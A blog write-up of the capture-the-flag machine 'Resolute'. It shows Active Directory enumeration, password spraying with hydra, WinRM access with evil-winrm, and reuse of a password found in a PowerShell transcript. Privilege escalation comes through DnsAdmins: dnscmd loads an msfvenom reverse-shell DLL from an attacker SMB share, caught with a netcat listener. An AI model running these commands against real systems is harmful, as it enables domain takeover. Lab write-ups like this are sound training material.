Resolute Write-Up

User Flag

Result of nmap scan:

88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-14 20:28:46Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49709/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h29m14s, deviation: 4h02m32s, median: 9m12s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-03-14T13:29:48-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-14T20:29:44
|_  start_date: 2020-03-14T18:02:17

This result shows that this is a Windows box with Active Directory, Kerberos and WinRM active. The nmap script results on SMB port shows also it allows guest sessions. From this information and my experience, I establish the roadmap to user flag as follows:

  • Try to enumerate the AD domain.
  • If plaintext passwords are found during enumeration, or in readable SMB shares, try them. If that does not work try password spraying.
  • If no password found, try techniques like AS-REP Roasting.
  • Try to connect to the box via WinRM.

Let’s proceed so to the AD enumeration.

$ enum4linux -a | tee guestenum.txt
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)                                                          
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain          
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela       Name: (null)    Desc: (null)                                                          
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette      Name: (null)    Desc: (null)                                                          
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika       Name: (null)    Desc: (null)                                                          
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire       Name: (null)    Desc: (null)                                                          
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude       Name: (null)    Desc: (null)                                                          
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.                           
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia      Name: (null)    Desc: (null)                                                          
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)                                                                  
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain                
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo      Name: (null)    Desc: (null)                                                          
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account                                 
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)                                                          
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!                    
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)                                                          
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki        Name: (null)    Desc: (null)                                                          
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo        Name: (null)    Desc: (null)                                                          
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)                                                                  
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)                                                          
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally        Name: (null)    Desc: (null)                                                          
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon        Name: (null)    Desc: (null)                                                          
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve        Name: (null)    Desc: (null)                                                          
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie       Name: (null)    Desc: (null)                                                          
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita       Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)

The first lines of output give us the list of domain users and inside the user marko comment, a default password of Welcome123!.

Trying the credentials marko:Welcome123! on SMB didn’t work. So I jumped to the next item on my roadmap which is password spraying using hydra.

$ cat guestenum.txt | grep "Account:" | awk '{print $8}' > users.txt
$ hydra -L users.txt -p 'Welcome123!' smb://
[445][smb] host:   login: melanie   password: Welcome123!

And that worked! The password is applicable for the user melanie.

Let’s try that with evil-winrm to check if user has access via WinRM.

$ evil-winrm -i -u melanie -p 'Welcome123!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> dir ..\Desktop

    Directory: C:\Users\melanie\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2019   7:33 AM             32 user.txt

*Evil-WinRM* PS C:\Users\melanie\Documents>

And Voilà!

Root Flag

My usual roadmap:

  • Look for privilege I can exploit with whoami /all
  • Execute winPEAS to look for vulnerabilities I can use.
  • Use BloodHound to show possible paths to domain admins.
  • Proceed to manual exploration for interesting files.

For the user melanie, the first three points didn’t reveal anything interesting which lead me to go for manual exploration.
In the root drive (C:), I found a hidden directory called PSTranscripts. Listing it further reveals the transcript of a powershell session at C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt. Download it, open it and you will see at ligne 35, that the user ryan is trying to mount a share and provided a cleartext password: Serv3r4Admin4cc123!. Try those credentials in evil-winrm and it works!

Now we are ryan, Let’s go through our roadmap once again. The first point which is whoami /all reveals that ryan is part of the group DnsAdmin. From some reading I found a while ago, it is possible to make a privilege escalation from ryan. Basically, it consists of loading an arbritrary DLL from a SMB share on the DNS Server which is running as SYSTEM.

So here it goes on the attacker side (install Impacket if you haven’t yet).

### Generate a reverse shell dll using msfvenom
$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=<tun0_IP> LPORT=4444 -f dll -o shell.dll
### Start a SMB Server listening on tun0 interface with a share named REV
$ sudo /usr/share/doc/python3-impacket/examples/ -ip <tun0_ip> REV ./
### In another shell or tmux window, start netcat listener
$ sudo nc -lvnp 4444

Client Side

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\<tun0_ip>\REV\shell.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x4e20
        PID                : 1372
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents>

And we got a shell in our netcat listener.

Congratulations, you just rooted the box.

Mamadou L. NIANG
Mamadou L. NIANG
Cybersecurity Consultant

Senior Java developer mainly around Spring and now, on my way to being a professional pentester.I love learning plenty of stuff and sometimes breaking them.

comments powered by Disqus